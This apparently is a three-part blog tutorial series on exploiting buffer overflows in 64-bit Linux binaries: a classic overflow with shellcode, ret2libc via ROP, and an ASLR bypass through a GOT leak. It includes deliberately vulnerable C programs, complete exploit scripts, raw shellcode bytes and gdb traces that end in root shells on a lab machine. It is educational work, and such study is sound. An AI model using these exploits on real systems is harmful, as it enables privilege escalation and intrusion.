system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
.
.
.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"
Gadgets
=======


0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

